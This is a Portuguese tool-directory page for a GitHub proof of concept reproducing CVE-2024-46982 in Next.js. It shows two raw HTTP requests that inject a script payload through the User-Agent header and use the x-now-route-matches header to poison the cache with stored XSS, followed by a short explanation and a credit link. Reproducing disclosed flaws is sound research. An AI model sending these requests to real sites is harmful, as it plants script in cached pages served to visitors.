Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/samuel871211/cve-2024-46982-reproduction
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Web
GitHubsamuel871211/cve-2024-46982-reproduction

CVE-2024-46982-Reproduction

Reprodução de CVE-2024-46982

Ver Repositório
4há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Getting Started

  1. Instale o Node.js LTS
  2. npm install
  3. npm run build
  4. npm run start

Exploração 1: XSS Armazenado via Envenenamento de Cache

  1. Envie a seguinte requisição HTTP (Requisição de Ataque) usando qualquer cliente HTTP.
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack 2. Visite http://localhost:3000 (Requisição Normal) usando qualquer navegador web. CVE-2024-46982-normal

Exploração 2: XSS Armazenado via Envenenamento de Cache

  1. Envie a seguinte requisição HTTP (Requisição de Ataque) usando qualquer cliente HTTP, certifique-se de substituir "UiKoKFFGnF1td3mMyeDX5" pelo seu ".next/BUILD_ID" CVE-2024-46982-build-id
root@kitploit:~
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack-2 2. Visite http://localhost:3000 (Requisição Normal) usando qualquer navegador web. CVE-2024-46982-normal

Como funciona?

  1. x-now-route-matches é um cabeçalho HTTP personalizado reconhecido pelo Next.js. Quando presente, o Next.js tratará a requisição HTTP como "SSG" (Geração de Site Estático), na qual a resposta HTTP pode ser armazenada em cache (Cache-Control: s-maxage=1, stale-while-revalidate).

  2. ?__nextDataReq=1 é uma querystring reconhecida pelo Next.js. Quando presente, o Next.js tratará a requisição HTTP como "Recuperando __NEXT_DATA__".

O writeup completo pode ser encontrado na seção Credit

Credit

  • https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir
Baixar ferramenta